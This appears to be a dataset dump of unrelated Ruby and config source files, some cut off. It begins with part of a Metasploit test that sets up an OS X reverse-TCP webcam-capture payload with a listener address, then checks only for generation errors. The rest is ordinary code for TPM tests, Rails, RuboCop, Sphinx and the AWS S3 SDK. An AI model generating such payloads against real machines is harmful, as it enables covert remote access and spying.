it 'should raise an error' do
expect{payload_generator.generate_payload}.to raise_error(Msf::PayloadSpaceViolation, "The payload exceeds the specified space")
end
end
context 'when the payload format is invalid for the platform' do
let!(:payload_module) {
load_and_create_module(
ancestor_reference_names: %w{
stagers/osx/x86/reverse_tcp
stages/osx/x86/isight
},
module_type: 'payload',
reference_name: 'osx/x86/isight/reverse_tcp'
)
}
let(:generator_opts) {
{
datastore: { 'LHOST' => '192.168.172.1', 'LPORT' => '8443' } ,
format: 'elf',
framework: framework,
keep: false,
payload: 'osx/x86/isight/reverse_tcp',
stdin: nil,
}
}
it 'should raise an error' do
expect{payload_generator.generate_payload}.to raise_error(Msf::PayloadGeneratorError, "The payload could not be generated, check options")
end
end
end
| 33.45389 | 183 | 0.554292 |
bf8cb08b59227519d9c79d273e0ce11bb66c2750 | 3,767 | require 'spec_helper_acceptance'
test_name 'install tpm simulators'
describe 'install tpm_simulators' do
# Implement any workarounds that are needed to run as service
def implement_workarounds(hirs_host)
# workaround for dbus config file mismatch error:
# "dbus[562]: [system] Unable to reload configuration: Configuration file
# needs one or more <listen> elements giving addresses"
on hirs_host, 'systemctl restart dbus'
end
# starts tpm2sim service
def start_tpm2sim_on(hirs_host)
on hirs_host, 'yum install -y tpm2-tools'
on hirs_host, 'runuser tpm2sim --shell /bin/sh -c ' \
'"cd /tmp; nohup /usr/local/bin/tpm2-simulator &> /tmp/tpm2-simulator.log &"', \
pty: true, run_in_parallel: true
end
def config_abrmd_for_tpm2sim_on(hirs_host)
on hirs_host, 'mkdir -p /etc/systemd/system/tpm2-abrmd.service.d'
# Configure the TAB/RM to talk to the TPM2 simulator
extra_file=<<-SYSTEMD.gsub(/^\s*/,'')
[Service]
ExecStart=
ExecStart=/sbin/tpm2-abrmd -t socket
SYSTEMD
create_remote_file hirs_host, '/etc/systemd/system/tpm2-abrmd.service.d/override.conf', extra_file
on hirs_host, 'systemctl daemon-reload'
on hirs_host, 'systemctl list-unit-files | grep tpm2-abrmd ' \
+ '&& systemctl restart tpm2-abrmd ' \
+ %q[|| echo "tpm2-abrmd.service not restarted because it doesn't exist"]
end
# start the tpm2sim and override tpm2-abrmd's systemd config use it
# assumes the tpm2sim has been installed on the hosts
def configure_tpm2_0_tools(hirs_host)
start_tpm2sim_on(hirs_host)
config_abrmd_for_tpm2sim_on(hirs_host)
end
# This is a helper to get the status of the TPM so it can be compared against the
# the expected results.
def get_tpm2_status(hirs_host)
stdout = on(hirs_host, 'facter -p -y tpm2 --strict').stdout
fact = YAML.safe_load(stdout)['tpm2']
tpm2_status = fact['tpm2_getcap']['properties-variable']['TPM_PT_PERSISTENT']
[tpm2_status['ownerAuthSet'],tpm2_status['endorsementAuthSet'],tpm2_status['lockoutAuthSet']]
end
# starts tpm 1.2 simulator services
# Per the README file included with the source code, procedures for starting the tpm are:
# Start the TPM in another shell after setting its environment variables
# (TPM_PATH,TPM_PORT)
# > cd utils
# > ./tpmbios
# Kill the TPM in the other shell and restart it
def start_tpm_1_2_sim(hirs_host)
os = fact_on(hirs_host,'operatingsystemmajrelease')
on hirs_host, 'yum install -y trousers gcc tpm-tools'
if os.eql?('7')
on hirs_host, 'systemctl start tpm12-simulator'
on hirs_host, 'systemctl start tpm12-tpmbios'
on hirs_host, 'systemctl restart tpm12-simulator'
on hirs_host, 'systemctl restart tpm12-tpmbios'
on hirs_host, 'systemctl start tpm12-tpminit'
on hirs_host, 'systemctl start tpm12-tcsd'
else os.eql?('6')
on hirs_host, 'service tpm12-simulator start '
on hirs_host, 'service tpm12-tpmbios start '
on hirs_host, 'service tpm12-simulator restart '
on hirs_host, 'service tpm12-tpmbios start '
on hirs_host, 'service tpm12-tpminit start '
on hirs_host, 'service tpm12-tcsd start '
end
end
context 'on a hirs host' do
hosts_with_role(hosts, 'hirs').each do |hirs_host|
# Using puppet_apply as a helper
it 'should work with no errors' do
if hirs_host.host_hash[:roles].include?('tpm_2_0')
install_package(hirs_host,'simp-tpm2-simulator')
implement_workarounds(hirs_host)
configure_tpm2_0_tools(hirs_host)
else
install_package(hirs_host,'simp-tpm12-simulator')
start_tpm_1_2_sim(hirs_host)
end
end
end
end
end
| 38.050505 | 102 | 0.701088 |
5d5db8917a00a345ca4cee0d465960becf101630 | 1,802 | class ViewCell
class << self
# load cell based on a name, pass context and optional vars
# ViewCell.get(:user, self) -> UserCell.new(self)
def get parent, name, vars={}
('%sCell' % name.to_s.classify)
.constantize
.new parent, vars
end
# delegate current scope methods to parent binding
# delegate :image_tag, :request, params
def delegate *list
list.each do |el|
define_method(el) { |*args, &block| parent.send(el, *args, &block) }
end
end
# = cell @users
# = cell @user
# = cell.user.render @user
# = cell(:user, user: @user).render
def cell parent, *args
if args.first
# covert to list of objects
unless [String, Symbol, Array].include?(args[0].class)
args[0] = [args.first]
end
out =
if args.first.class == Array
# cell @users
args.first.map do |object|
name = object.class.to_s.underscore.to_sym
ViewCell.get(parent, name).render object
end.join('')
else
# cell(:user, user: @user).profile
ViewCell.get parent, *args
end
out.respond_to?(:html_safe) ? out.html_safe : out
else
# cell.user.profile
ViewCell::Proxy.new(parent)
end
end
# can be called as a block or a method
# block do ...
# def block; super; ...
def before &block
define_method :before do
super() if self.class != ViewCell
instance_exec &block
end
end
# set or get template root directory
def template_root name=nil
if name
self.class.instance_variable_set :@template_root, name
else
self.class.instance_variable_get :@template_root
end
end
end
end
| 26.115942 | 76 | 0.577691 |
e86efd6d2654fb4a19477a2516f37cb3f3886c94 | 3,551 | # frozen_string_literal: true
module RuboCop
module Cop
module Rails
# This cop checks dynamic `find_by_*` methods.
# Use `find_by` instead of dynamic method.
# See. https://rails.rubystyle.guide#find_by
#
# @example
# # bad
# User.find_by_name(name)
# User.find_by_name_and_email(name)
# User.find_by_email!(name)
#
# # good
# User.find_by(name: name)
# User.find_by(name: name, email: email)
# User.find_by!(email: email)
#
# @example AllowedMethods: find_by_sql
# # bad
# User.find_by_query(users_query)
#
# # good
# User.find_by_sql(users_sql)
#
# @example AllowedReceivers: Gem::Specification
# # bad
# Specification.find_by_name('backend').gem_dir
#
# # good
# Gem::Specification.find_by_name('backend').gem_dir
class DynamicFindBy < Cop
MSG = 'Use `%<static_name>s` instead of dynamic `%<method>s`.'
METHOD_PATTERN = /^find_by_(.+?)(!)?$/.freeze
def on_send(node)
return if allowed_invocation?(node)
method_name = node.method_name
static_name = static_method_name(method_name)
return unless static_name
return if node.arguments.any?(&:splat_type?)
add_offense(node,
message: format(MSG, static_name: static_name,
method: method_name))
end
alias on_csend on_send
def autocorrect(node)
keywords = column_keywords(node.method_name)
return if keywords.size != node.arguments.size
lambda do |corrector|
autocorrect_method_name(corrector, node)
autocorrect_argument_keywords(corrector, node, keywords)
end
end
private
def allowed_invocation?(node)
allowed_method?(node) || allowed_receiver?(node) ||
whitelisted?(node)
end
def allowed_method?(node)
return unless cop_config['AllowedMethods']
cop_config['AllowedMethods'].include?(node.method_name.to_s)
end
def allowed_receiver?(node)
return unless cop_config['AllowedReceivers'] && node.receiver
cop_config['AllowedReceivers'].include?(node.receiver.source)
end
# config option `WhiteList` will be deprecated soon
def whitelisted?(node)
whitelist_config = cop_config['Whitelist']
return unless whitelist_config
whitelist_config.include?(node.method_name.to_s)
end
def autocorrect_method_name(corrector, node)
corrector.replace(node.loc.selector,
static_method_name(node.method_name.to_s))
end
def autocorrect_argument_keywords(corrector, node, keywords)
keywords.each.with_index do |keyword, idx|
corrector.insert_before(node.arguments[idx].loc.expression, keyword)
end
end
def column_keywords(method)
keyword_string = method.to_s[METHOD_PATTERN, 1]
keyword_string.split('_and_').map { |keyword| "#{keyword}: " }
end
# Returns static method name.
# If code isn't wrong, returns nil
def static_method_name(method_name)
match = METHOD_PATTERN.match(method_name)
return nil unless match
match[2] ? 'find_by!' : 'find_by'
end
end
end
end
end
| 30.09322 | 80 | 0.595044 |
ff900b1c2fbad94eeb3ba722499b6e246015ae76 | 667 | # coding: utf-8
Gem::Specification.new do |spec|
spec.name = "hyperspace_jekyll_theme"
spec.version = "0.1.1"
spec.authors = ["Andrew Banchich"]
spec.email = ["[email protected]"]
spec.summary = %q{A Jekyll version of the "Hyperspace" theme by HTML5 UP.}
spec.homepage = "https://gitlab.com/andrewbanchich/hyperspace-jekyll-theme"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r{^(assets|_layouts|_includes|_sass|LICENSE|README)}i) }
spec.add_development_dependency "jekyll", "~> 4.0"
spec.add_development_dependency "bundler", "~> 2.1"
end
| 37.055556 | 132 | 0.643178 |
87af10cd05091697430f1202118fa3224a466536 | 1,473 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(:default, Rails.env)
module Myapp
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
config.assets.precompile += [ 'appviews.css', 'cssanimations.css', 'dashboards.css', 'forms.css', 'gallery.css', 'graphs.css', 'mailbox.css', 'miscellaneous.css', 'pages.css', 'tables.css', 'uielements.css', 'widgets.css', 'commerce.css' ]
config.assets.precompile += [ 'appviews.js', 'cssanimations.js', 'dashboards.js', 'forms.js', 'gallery.js', 'graphs.js', 'mailbox.js', 'miscellaneous.js', 'pages.js', 'tables.js', 'uielements.js', 'widgets.js', 'commerce.js', 'metrics.js' ]
end
end
| 52.607143 | 244 | 0.704005 |
08124fc729521b041741ea1864eb51f04196ca63 | 776 | workers = Integer(ENV['WEB_CONCURRENCY'] || 2)
threads_count = Integer(ENV['RAILS_MAX_THREADS'] || 5)
threads threads_count, threads_count
preload_app!
rackup DefaultRackup
port ENV['PORT'] || 3000
environment ENV['RACK_ENV'] || 'development'
on_worker_boot do
require "active_record"
ActiveRecord::Base.connection.disconnect! rescue ActiveRecord::ConnectionNotEstablished
ActiveRecord::Base.establish_connection(YAML.load_file("#{Rails.root}/config/database.yml")[rails_env])
end
before_fork do
PumaWorkerKiller.config do |config|
config.ram = 512 # mb
config.frequency = 5 # seconds
config.percent_usage = 0.98
config.rolling_restart_frequency = 12 * 3600 # 12 hours in seconds
end
PumaWorkerKiller.start
end
| 29.846154 | 105 | 0.731959 |
f8a6a4dcbaf9d50ef2b88f229e77d09e93d0fd67 | 1,965 | # frozen_string_literal: true
class ThinkingSphinx::IndexSet
include Enumerable
def self.reference_name(klass)
@cached_results ||= {}
@cached_results[klass.name] ||= klass.name.underscore.to_sym
end
delegate :each, :empty?, :to => :indices
def initialize(options = {}, configuration = nil)
@options = options
@index_names = options[:indices] || []
@configuration = configuration || ThinkingSphinx::Configuration.instance
end
def ancestors
classes_and_ancestors - classes
end
def to_a
indices
end
private
attr_reader :configuration, :options
def all_indices
configuration.preload_indices
configuration.indices
end
def classes
options[:classes] || []
end
def classes_specified?
classes.any? || references_specified?
end
def classes_and_ancestors
@classes_and_ancestors ||= mti_classes + sti_classes.collect { |model|
model.ancestors.take_while { |klass|
klass != ActiveRecord::Base
}.select { |klass|
klass.class == Class
}
}.flatten
end
def index_names
options[:indices] || []
end
def indices
return all_indices.select { |index|
index_names.include?(index.name)
} if index_names.any?
everything = classes_specified? ? indices_for_references : all_indices
everything.reject &:distributed?
end
def indices_for_references
all_indices.select { |index| references.include? index.reference }
end
def mti_classes
classes.reject { |klass|
klass.column_names.include?(klass.inheritance_column)
}
end
def references
options[:references] || classes_and_ancestors.collect { |klass|
ThinkingSphinx::IndexSet.reference_name(klass)
}
end
def references_specified?
options[:references] && options[:references].any?
end
def sti_classes
classes.select { |klass|
klass.column_names.include?(klass.inheritance_column)
}
end
end
| 21.129032 | 76 | 0.68855 |
b9c9208eb9a4e7593f424b1273b6079e57505dff | 260 | class CreateUsers < ActiveRecord::Migration[5.1]
def change
create_table :users do |t|
t.string :provider
t.string :uid
t.string :name
t.string :oauth_token
t.datetime :oauth_expires_at
t.timestamps
end
end
end
| 18.571429 | 48 | 0.642308 |
2641ce8a52c54aa19c03fd44803e7b484860561f | 1,083 | module PurchaseRequestsHelper
def i18n_pr_state(state)
case state
when 'pending'
t('purchase_request.pending')
when 'accepted'
t('purchase_request.not_ordered')
when 'rejected'
t('purchase_request.reject')
when 'ordered'
t('purchase_request.ordered')
end
end
def can_use_purchase_request?
role_can_use_purchase_request = SystemConfiguration.get("purchase_request.can_use")
if role_can_use_purchase_request == ''
return true
else
if user_signed_in?
case role_can_use_purchase_request
when 'Guest'
return true if ['Guest', 'User', 'Librarian', 'Administrator'].include?(current_user.role.name)
when 'User'
return true if ['User', 'Librarian', 'Administrator'].include?(current_user.role.name)
when 'Librarian'
return true if ['Librarian', 'Administrator'].include?(current_user.role.name)
when 'Administrator'
return true if ['Administrator'].include?(current_user.role.name)
end
end
end
false
end
end
| 30.083333 | 105 | 0.663897 |
08b6d66ef8fd1e79eab447101cdf3a614b1c64d4 | 134 | require 'spec_helper'
describe SlackGoogleBot do
it 'has a version' do
expect(SlackGoogleBot::VERSION).to_not be nil
end
end
| 16.75 | 49 | 0.753731 |
87d1b085055190cf982ce66bc103e495b19239f6 | 749 | name "poppler"
default_version "0.24.5"
version "0.24.5" do
source md5: "334f2ac95cc8039f2a57fe63e4a81c69"
end
dependency "fontconfig"
dependency "zlib"
dependency "libxml2"
dependency "curl"
dependency "libtiff"
dependency "libjpeg"
dependency "libpng"
dependency "lcms2"
dependency "poppler-data"
source :url => "http://poppler.freedesktop.org/poppler-#{version}.tar.xz"
relative_path "poppler-#{version}"
build do
env = with_standard_compiler_flags(with_embedded_path)
configure = [
"./configure",
"--prefix=#{install_dir}/embedded",
"--enable-zlib",
"--enable-libcurl",
"--enable-cms=lcms2",
]
command configure.join(" "), :env => env
command "make -j #{workers}", :env => env
command "make install"
end
| 20.243243 | 73 | 0.70227 |
e990896c872bbabfa8ed37758b22a18b00d99d17 | 545 | require 'json'
package = JSON.parse(File.read(File.join(__dir__, '../../package.json')))
Pod::Spec.new do |s|
s.name = package['name']
s.version = package['version']
s.summary = package['description']
s.authors = { "yiyi" => "[email protected]" }
s.homepage = package['repository']['url']
s.license = package['license']
s.platform = :ios, "9.0"
s.source = { :git => package['repository']['url'] }
s.source_files = '**/*.{h,m}'
s.dependency 'React'
s.dependency 'MQTTKit'
end
| 24.772727 | 73 | 0.572477 |
7978d07256e018fdab8e021a5b2445521c4f5865 | 67,674 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::S3
class Object
extend Aws::Deprecations
# @overload def initialize(bucket_name, key, options = {})
# @param [String] bucket_name
# @param [String] key
# @option options [Client] :client
# @overload def initialize(options = {})
# @option options [required, String] :bucket_name
# @option options [required, String] :key
# @option options [Client] :client
def initialize(*args)
options = Hash === args.last ? args.pop.dup : {}
@bucket_name = extract_bucket_name(args, options)
@key = extract_key(args, options)
@data = options.delete(:data)
@client = options.delete(:client) || Client.new(options)
@waiter_block_warned = false
end
# @!group Read-Only Attributes
# @return [String]
def bucket_name
@bucket_name
end
# @return [String]
def key
@key
end
# Specifies whether the object retrieved was (true) or was not (false) a
# Delete Marker. If false, this response header does not appear in the
# response.
# @return [Boolean]
def delete_marker
data[:delete_marker]
end
# Indicates that a range of bytes was specified.
# @return [String]
def accept_ranges
data[:accept_ranges]
end
# If the object expiration is configured (see PUT Bucket lifecycle), the
# response includes this header. It includes the expiry-date and rule-id
# key-value pairs providing object expiration information. The value of
# the rule-id is URL encoded.
# @return [String]
def expiration
data[:expiration]
end
# If the object is an archived object (an object whose storage class is
# GLACIER), the response includes this header if either the archive
# restoration is in progress (see [RestoreObject][1] or an archive copy
# is already restored.
#
# If an archive copy is already restored, the header value indicates
# when Amazon S3 is scheduled to delete the object copy. For example:
#
# `x-amz-restore: ongoing-request="false", expiry-date="Fri, 23 Dec 2012
# 00:00:00 GMT"`
#
# If the object restoration is in progress, the header returns the value
# `ongoing-request="true"`.
#
# For more information about archiving objects, see [Transitioning
# Objects: General Considerations][2].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html
# [2]: https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lifecycle-mgmt.html#lifecycle-transition-general-considerations
# @return [String]
def restore
data[:restore]
end
# The archive state of the head object.
# @return [String]
def archive_status
data[:archive_status]
end
# Creation date of the object.
# @return [Time]
def last_modified
data[:last_modified]
end
# Size of the body in bytes.
# @return [Integer]
def content_length
data[:content_length]
end
# An ETag is an opaque identifier assigned by a web server to a specific
# version of a resource found at a URL.
# @return [String]
def etag
data[:etag]
end
# This is set to the number of metadata entries not returned in
# `x-amz-meta` headers. This can happen if you create metadata using an
# API like SOAP that supports more flexible metadata than the REST API.
# For example, using SOAP, you can create metadata whose values are not
# legal HTTP headers.
# @return [Integer]
def missing_meta
data[:missing_meta]
end
# Version of the object.
# @return [String]
def version_id
data[:version_id]
end
# Specifies caching behavior along the request/reply chain.
# @return [String]
def cache_control
data[:cache_control]
end
# Specifies presentational information for the object.
# @return [String]
def content_disposition
data[:content_disposition]
end
# Specifies what content encodings have been applied to the object and
# thus what decoding mechanisms must be applied to obtain the media-type
# referenced by the Content-Type header field.
# @return [String]
def content_encoding
data[:content_encoding]
end
# The language the content is in.
# @return [String]
def content_language
data[:content_language]
end
# A standard MIME type describing the format of the object data.
# @return [String]
def content_type
data[:content_type]
end
# The date and time at which the object is no longer cacheable.
# @return [Time]
def expires
data[:expires]
end
# @return [String]
def expires_string
data[:expires_string]
end
# If the bucket is configured as a website, redirects requests for this
# object to another object in the same bucket or to an external URL.
# Amazon S3 stores the value of this header in the object metadata.
# @return [String]
def website_redirect_location
data[:website_redirect_location]
end
# If the object is stored using server-side encryption either with an
# AWS KMS customer master key (CMK) or an Amazon S3-managed encryption
# key, the response includes this header with the value of the
# server-side encryption algorithm used when storing this object in
# Amazon S3 (for example, AES256, aws:kms).
# @return [String]
def server_side_encryption
data[:server_side_encryption]
end
# A map of metadata to store with the object in S3.
# @return [Hash<String,String>]
def metadata
data[:metadata]
end
# If server-side encryption with a customer-provided encryption key was
# requested, the response will include this header confirming the
# encryption algorithm used.
# @return [String]
def sse_customer_algorithm
data[:sse_customer_algorithm]
end
# If server-side encryption with a customer-provided encryption key was
# requested, the response will include this header to provide round-trip
# message integrity verification of the customer-provided encryption
# key.
# @return [String]
def sse_customer_key_md5
data[:sse_customer_key_md5]
end
# If present, specifies the ID of the AWS Key Management Service (AWS
# KMS) symmetric customer managed customer master key (CMK) that was
# used for the object.
# @return [String]
def ssekms_key_id
data[:ssekms_key_id]
end
# Indicates whether the object uses an S3 Bucket Key for server-side
# encryption with AWS KMS (SSE-KMS).
# @return [Boolean]
def bucket_key_enabled
data[:bucket_key_enabled]
end
# Provides storage class information of the object. Amazon S3 returns
# this header for all objects except for S3 Standard storage class
# objects.
#
# For more information, see [Storage Classes][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/storage-class-intro.html
# @return [String]
def storage_class
data[:storage_class]
end
# If present, indicates that the requester was successfully charged for
# the request.
# @return [String]
def request_charged
data[:request_charged]
end
# Amazon S3 can return this header if your request involves a bucket
# that is either a source or a destination in a replication rule.
#
# In replication, you have a source bucket on which you configure
# replication and destination bucket or buckets where Amazon S3 stores
# object replicas. When you request an object (`GetObject`) or object
# metadata (`HeadObject`) from these buckets, Amazon S3 will return the
# `x-amz-replication-status` header in the response as follows:
#
# * If requesting an object from the source bucket — Amazon S3 will
# return the `x-amz-replication-status` header if the object in your
# request is eligible for replication.
#
# For example, suppose that in your replication configuration, you
# specify object prefix `TaxDocs` requesting Amazon S3 to replicate
# objects with key prefix `TaxDocs`. Any objects you upload with this
# key name prefix, for example `TaxDocs/document1.pdf`, are eligible
# for replication. For any object request with this key name prefix,
# Amazon S3 will return the `x-amz-replication-status` header with
# value PENDING, COMPLETED or FAILED indicating object replication
# status.
#
# * If requesting an object from a destination bucket — Amazon S3 will
# return the `x-amz-replication-status` header with value REPLICA if
# the object in your request is a replica that Amazon S3 created and
# there is no replica modification replication in progress.
#
# * When replicating objects to multiple destination buckets the
# `x-amz-replication-status` header acts differently. The header of
# the source object will only return a value of COMPLETED when
# replication is successful to all destinations. The header will
# remain at value PENDING until replication has completed for all
# destinations. If one or more destinations fails replication the
# header will return FAILED.
#
# For more information, see [Replication][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/NotificationHowTo.html
# @return [String]
def replication_status
data[:replication_status]
end
# The count of parts this object has.
# @return [Integer]
def parts_count
data[:parts_count]
end
# The Object Lock mode, if any, that's in effect for this object. This
# header is only returned if the requester has the
# `s3:GetObjectRetention` permission. For more information about S3
# Object Lock, see [Object Lock][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock.html
# @return [String]
def object_lock_mode
data[:object_lock_mode]
end
# The date and time when the Object Lock retention period expires. This
# header is only returned if the requester has the
# `s3:GetObjectRetention` permission.
# @return [Time]
def object_lock_retain_until_date
data[:object_lock_retain_until_date]
end
# Specifies whether a legal hold is in effect for this object. This
# header is only returned if the requester has the
# `s3:GetObjectLegalHold` permission. This header is not returned if the
# specified version of this object has never had a legal hold applied.
# For more information about S3 Object Lock, see [Object Lock][1].
#
#
#
# [1]: https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock.html
# @return [String]
def object_lock_legal_hold_status
data[:object_lock_legal_hold_status]
end
# @!endgroup
# @return [Client]
def client
@client
end
# Loads, or reloads {#data} for the current {Object}.
# Returns `self` making it possible to chain methods.
#
# object.reload.data
#
# @return [self]
def load
resp = @client.head_object(
bucket: @bucket_name,
key: @key
)
@data = resp.data
self
end
alias :reload :load
# @return [Types::HeadObjectOutput]
# Returns the data for this {Object}. Calls
# {Client#head_object} if {#data_loaded?} is `false`.
def data
load unless @data
@data
end
# @return [Boolean]
# Returns `true` if this resource is loaded. Accessing attributes or
# {#data} on an unloaded resource will trigger a call to {#load}.
def data_loaded?
!!@data
end
# @param [Hash] options ({})
# @return [Boolean]
# Returns `true` if the Object exists.
def exists?(options = {})
begin
wait_until_exists(options.merge(max_attempts: 1))
true
rescue Aws::Waiters::Errors::UnexpectedError => e
raise e.error
rescue Aws::Waiters::Errors::WaiterFailed
false
end
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (20)
# @option options [Float] :delay (5)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [Object]
def wait_until_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::ObjectExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(bucket: @bucket_name,
key: @key))
Object.new({
bucket_name: @bucket_name,
key: @key,
client: @client
})
end
# @param [Hash] options ({})
# @option options [Integer] :max_attempts (20)
# @option options [Float] :delay (5)
# @option options [Proc] :before_attempt
# @option options [Proc] :before_wait
# @return [Object]
def wait_until_not_exists(options = {}, &block)
options, params = separate_params_and_options(options)
waiter = Waiters::ObjectNotExists.new(options)
yield_waiter_and_warn(waiter, &block) if block_given?
waiter.wait(params.merge(bucket: @bucket_name,
key: @key))
Object.new({
bucket_name: @bucket_name,
key: @key,
client: @client
})
end
# @deprecated Use [Aws::S3::Client] #wait_until instead
#
# Waiter polls an API operation until a resource enters a desired
# state.
#
# @note The waiting operation is performed on a copy. The original resource
# remains unchanged.
#
# ## Basic Usage
#
# Waiter will polls until it is successful, it fails by
# entering a terminal state, or until a maximum number of attempts
# are made.
#
# # polls in a loop until condition is true
# resource.wait_until(options) {|resource| condition}
#
# ## Example
#
# instance.wait_until(max_attempts:10, delay:5) do |instance|
# instance.state.name == 'running'
# end
#
# ## Configuration
#
# You can configure the maximum number of polling attempts, and the
# delay (in seconds) between each polling attempt. The waiting condition is
# set by passing a block to {#wait_until}:
#
# # poll for ~25 seconds
# resource.wait_until(max_attempts:5,delay:5) {|resource|...}
#
# ## Callbacks
#
# You can be notified before each polling attempt and before each
# delay. If you throw `:success` or `:failure` from these callbacks,
# it will terminate the waiter.
#
# started_at = Time.now
# # poll for 1 hour, instead of a number of attempts
# proc = Proc.new do |attempts, response|
# throw :failure if Time.now - started_at > 3600
# end
#
# # disable max attempts
# instance.wait_until(before_wait:proc, max_attempts:nil) {...}
#
# ## Handling Errors
#
# When a waiter is successful, it returns the Resource. When a waiter
# fails, it raises an error.
#
# begin
# resource.wait_until(...)
# rescue Aws::Waiters::Errors::WaiterFailed
# # resource did not enter the desired state in time
# end
#
# @yieldparam [Resource] resource to be used in the waiting condition.
#
# @raise [Aws::Waiters::Errors::FailureStateError] Raised when the waiter
# terminates because the waiter has entered a state that it will not
# transition out of, preventing success.
#
# yet successful.
#
# @raise [Aws::Waiters::Errors::UnexpectedError] Raised when an error is
# encountered while polling for a resource that is not expected.
#
# @raise [NotImplementedError] Raised when the resource does not
#
# @option options [Integer] :max_attempts (10) Maximum number of
# attempts
# @option options [Integer] :delay (10) Delay between each
# attempt in seconds
# @option options [Proc] :before_attempt (nil) Callback
# invoked before each attempt
# @option options [Proc] :before_wait (nil) Callback
# invoked before each wait
# @return [Resource] if the waiter was successful
def wait_until(options = {}, &block)
self_copy = self.dup
attempts = 0
options[:max_attempts] = 10 unless options.key?(:max_attempts)
options[:delay] ||= 10
options[:poller] = Proc.new do
attempts += 1
if block.call(self_copy)
[:success, self_copy]
else
self_copy.reload unless attempts == options[:max_attempts]
:retry
end
end
Aws::Waiters::Waiter.new(options).wait({})
end
# @!group Actions
# @example Request syntax with placeholder values
#
# object.copy_from({
# acl: "private", # accepts private, public-read, public-read-write, authenticated-read, aws-exec-read, bucket-owner-read, bucket-owner-full-control
# cache_control: "CacheControl",
# content_disposition: "ContentDisposition",
# content_encoding: "ContentEncoding",
# content_language: "ContentLanguage",
# content_type: "ContentType",
# copy_source: "CopySource", # required
# copy_source_if_match: "CopySourceIfMatch",
# copy_source_if_modified_since: Time.now,
# copy_source_if_none_match: "CopySourceIfNoneMatch",
# copy_source_if_unmodified_since: Time.now,
# expires: Time.now,
# grant_full_control: "GrantFullControl",
# grant_read: "GrantRead",
# grant_read_acp: "GrantReadACP",
# grant_write_acp: "GrantWriteACP",
# metadata: {
# "MetadataKey" => "MetadataValue",
# },
# metadata_directive: "COPY", # accepts COPY, REPLACE
# tagging_directive: "COPY", # accepts COPY, REPLACE
# server_side_encryption: "AES256", # accepts AES256, aws:kms
# storage_class: "STANDARD", # accepts STANDARD, REDUCED_REDUNDANCY, STANDARD_IA, ONEZONE_IA, INTELLIGENT_TIERING, GLACIER, DEEP_ARCHIVE, OUTPOSTS
# website_redirect_location: "WebsiteRedirectLocation",
# sse_customer_algorithm: "SSECustomerAlgorithm",
# sse_customer_key: "SSECustomerKey",
# sse_customer_key_md5: "SSECustomerKeyMD5",
# ssekms_key_id: "SSEKMSKeyId",
# ssekms_encryption_context: "SSEKMSEncryptionContext",
# bucket_key_enabled: false,
# copy_source_sse_customer_algorithm: "CopySourceSSECustomerAlgorithm",
# copy_source_sse_customer_key: "CopySourceSSECustomerKey",
# copy_source_sse_customer_key_md5: "CopySourceSSECustomerKeyMD5",
# request_payer: "requester", # accepts requester
# tagging: "TaggingHeader",
# object_lock_mode: "GOVERNANCE", # accepts GOVERNANCE, COMPLIANCE
# object_lock_retain_until_date: Time.now,
# object_lock_legal_hold_status: "ON", # accepts ON, OFF
# expected_bucket_owner: "AccountId",
# expected_source_bucket_owner: "AccountId",
# })
# @param [Hash] options ({})
# @option options [String] :acl
# The canned ACL to apply to the object.
#
# This action is not supported by Amazon S3 on Outposts.
# @option options [String] :cache_control
# Specifies caching behavior along the request/reply chain.
# @option options [String] :content_disposition
# Specifies presentational information for the object.
# @option options [String] :content_encoding
# Specifies what content encodings have been applied to the object and
# thus what decoding mechanisms must be applied to obtain the media-type
# referenced by the Content-Type header field.
# @option options [String] :content_language
# The language the content is in.
# @option options [String] :content_type
# A standard MIME type describing the format of the object data.
# @option options [required, String] :copy_source
# Specifies the source object for the copy operation. You specify the
# value in one of two formats, depending on whether you want to access
# the source object through an [access point][1]\:
#
# * For objects not accessed through an access point, specify the name
# of the source bucket and the key of the source object, separated by
# a slash (/). For example, to copy the object `reports/january.pdf`
# from the bucket `awsexamplebucket`, use
# `awsexamplebucket/reports/january.pdf`. The value must be URL
# encoded.
#
# * For objects accessed through access points, specify the Amazon
# Resource Name (ARN) of the object as accessed through the access
# point, in the format
# `arn:aws:s3:<Region>:<account-id>:accesspoint/<access-point-name>/object/<key>`.
# For example, to copy the object `reports/january.pdf` through access
# point `my-access-point` owned by account `123456789012` in Region
# `us-west-2`, use the URL encoding of
# `arn:aws:s3:us-west-2:123456789012:accesspoint/my-access-point/object/reports/january.pdf`.
# The value must be URL encoded.
#
# <note markdown="1"> Amazon S3 supports copy operations using access points only when the
# source and destination buckets are in the same AWS Region.
#
# </note>
#
# Alternatively, for objects accessed through Amazon S3 on Outposts,
# specify the ARN of the object as accessed in the format
# `arn:aws:s3-outposts:<Region>:<account-id>:outpost/<outpost-id>/object/<key>`.
# For example, to copy the object `reports/january.pdf` through
# outpost `my-outpost` owned by account `123456789012` in Region
# `us-west-2`, use the URL encoding of
# `arn:aws:s3-outposts:us-west-2:123456789012:outpost/my-outpost/object/reports/january.pdf`.
